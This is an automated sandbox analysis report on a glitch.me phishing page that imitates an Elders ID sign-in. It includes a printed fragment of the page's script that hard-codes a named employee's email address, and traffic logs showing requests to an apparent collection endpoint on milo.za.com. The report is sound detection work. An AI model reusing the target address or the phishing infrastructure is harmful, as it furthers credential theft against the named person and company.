Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://astonishing-maize-sunstone.glitch.me/

Overview

General Information

Sample URL:https://astonishing-maize-sunstone.glitch.me/
Analysis ID:1549067
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Javascript uses Clearbit API to dynamically determine company logos
Detected hidden input values containing email addresses (often used in phishing pages)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML title does not match URL
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 5796 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5996 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1956,i,11158278246956056668,10871386056011559057,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://astonishing-maize-sunstone.glitch.me/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-05T09:02:15.148553+010020294931A Network Trojan was detected192.168.2.4543271.1.1.153UDP
2024-11-05T09:02:15.148689+010020294931A Network Trojan was detected192.168.2.4494881.1.1.153UDP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://astonishing-maize-sunstone.glitch.me/Avira URL Cloud: detection malicious, Label: phishing
Source: https://astonishing-maize-sunstone.glitch.me/SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

barindex
Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: const email = "matthew.harding@elders.com.au"; setcookie = (cname, cvalue, expdays) => { let date = new date(); date.settime(date.gettime() + (expdays * 24 * 60 * 60 * 1000)); const expires = "expires=" + date.toutcstring(); document.cookie = cname + "=" + cvalue + "; " + expires + "; path=/"; } getcookies = (cname) => { const name = cname + "="; const cdecoded = decodeuricomponent(document.cookie); const carr = cdecoded.split("; "); let value; carr.foreach(val => { if (val.indexof(name) === 0) { value = val.substring(name.length); } }); return value; } // set the cookie automatically when the page loads window.addeventlistener("load", () => { if (!getcookies("cookie")) { setcookie("cookie", true, 90); } ...
Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: Matthew.Harding@elders.com.au
Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: Number of links: 0
Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: Total embedded image size: 1360528
Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: Title: Sign in with elders ID does not match URL
Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: <input type="password" .../> found
Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: No <meta name="author".. found
Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: No <meta name="author".. found
Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: No <meta name="copyright".. found
Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: Network trafficSuricata IDS: 2029493 - Severity 1 - ET PHISHING Possible Glitch.me Phishing Domain : 192.168.2.4:49488 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2029493 - Severity 1 - ET PHISHING Possible Glitch.me Phishing Domain : 192.168.2.4:54327 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: astonishing-maize-sunstone.glitch.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wikipedia/commons/thumb/4/42/Adobe_Acrobat_DC_logo_2020.svg/384px-Adobe_Acrobat_DC_logo_2020.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://astonishing-maize-sunstone.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /wikipedia/commons/thumb/4/42/Adobe_Acrobat_DC_logo_2020.svg/384px-Adobe_Acrobat_DC_logo_2020.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /elders.com.au HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://astonishing-maize-sunstone.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /elders.com.au HTTP/1.1Host: logo.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET //pood/phpp4all.php HTTP/1.1Host: milo.za.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET //pood/phpp4all.php HTTP/1.1Host: milo.za.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://astonishing-maize-sunstone.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /.rum/@adobe/helix-rum-js@%5E2/dist/rum-standalone.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-body.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.css HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-head.lc-60038e123df28ea326da7b93dfc6bc75-lc.min.css HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.css HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site.lc-b12902665e7f329d47d0e56b8a41e8e6-lc.min.css HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-react.lc-3d0eb1ce53fb55bb5540e2cd4aabbacf-lc.min.css HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /recaptcha/api.js?render=6LcVfMUkAAAAAEztwcBFPpzCQQaiMDwAGyboUKaF HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-base.lc-de3a13856264e0a5f9a3056f8dca43c3-lc.min.css HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/el-logo-2.svg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /.rum/@adobe/helix-rum-js@%5E2/dist/rum-standalone.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
